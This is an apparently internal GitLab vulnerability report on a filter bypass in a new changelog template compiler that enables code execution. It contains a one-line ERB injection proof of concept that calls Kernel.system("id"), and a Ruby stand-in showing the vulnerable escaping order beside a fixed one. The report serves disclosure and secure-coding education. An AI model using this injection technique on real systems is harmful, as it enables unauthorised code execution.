Bypass filter in new changelog generation feature and achieve code execution
Summary
We are working on a new feature to generate changelogs and I missed something in my initial review. Thanks to @joernchen for spotting this.
Steps to reproduce
From the rails console
```ruby
[4] pry(main)> Gitlab::Changelog::Template::Compiler.new.compile("x<\\\n%::Kernel.system(\"id\")%>").render(binding)
uid=501(dcouture) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1)
=> "x"
```
Example Project
What is the current bug behavior?
It is possible to bypass the filter and run arbitrary ERB code.
What is the expected correct behavior?
The filter should catch this.
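To make the bug class concrete, here is an added, simplified stand-in for the template compiler (not GitLab's own `Compiler`). The assumption, drawn from the `<\` + newline + `%` shape of the payload, is that ERB tags are escaped before a backslash-newline line-continuation pass joins the lines; a benign probe replaces `Kernel.system`, and `compile_fixed` shows the ordering that closes the gap.

```ruby
require 'erb'

# Simplified stand-in for a template compiler (assumption: not GitLab's own
# Compiler). A backslash before a newline is treated as a line continuation.
CONTINUATION = /\\\n/.freeze

# Escape raw ERB start tags ("<%" becomes "<%%", which ERB prints literally)
# so a user-supplied template cannot embed Ruby.
def escape_erb(template)
  template.gsub('<%', '<%%')
end

# Vulnerable ordering: escape first, join continued lines second.
# "<\" + newline + "%" contains no "<%" when escaping runs, but joining
# the lines afterwards reassembles a live "<%" tag.
def compile_vulnerable(template)
  joined = escape_erb(template).gsub(CONTINUATION, '')
  ERB.new(joined, trim_mode: '-')
end

# Fixed ordering: finish every normalisation step, then escape what is left.
def compile_fixed(template)
  joined = template.gsub(CONTINUATION, '')
  ERB.new(escape_erb(joined), trim_mode: '-')
end

# Benign probe (constructed) with the same shape as the report's payload. If
# the tag runs as Ruby, the statement tag emits nothing (output "x") and sets
# `probe`; if it is escaped, the tag text comes back literally and `probe`
# is untouched.
PROBE = "x<\\\n% probe = :executed %>"

# Renders a compiled template and reports [output, probe_state].
def render(compiled)
  probe = :not_executed
  output = compiled.result(binding)
  [output, probe]
end

if $PROGRAM_NAME == __FILE__
  p render(compile_vulnerable(PROBE)) # => ["x", :executed]
  p render(compile_fixed(PROBE))      # => ["x<% probe = :executed %>", :not_executed]
end
```

The general lesson is that any sanitising step must run after every transformation that can change the byte sequence it inspects.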
Relevant logs and/or screenshots
Output of checks
This bug happens on GitLab.com; however, it is in code that isn't called by anything yet, as far as I know.
Possible fixes
Edited by Dominic Couture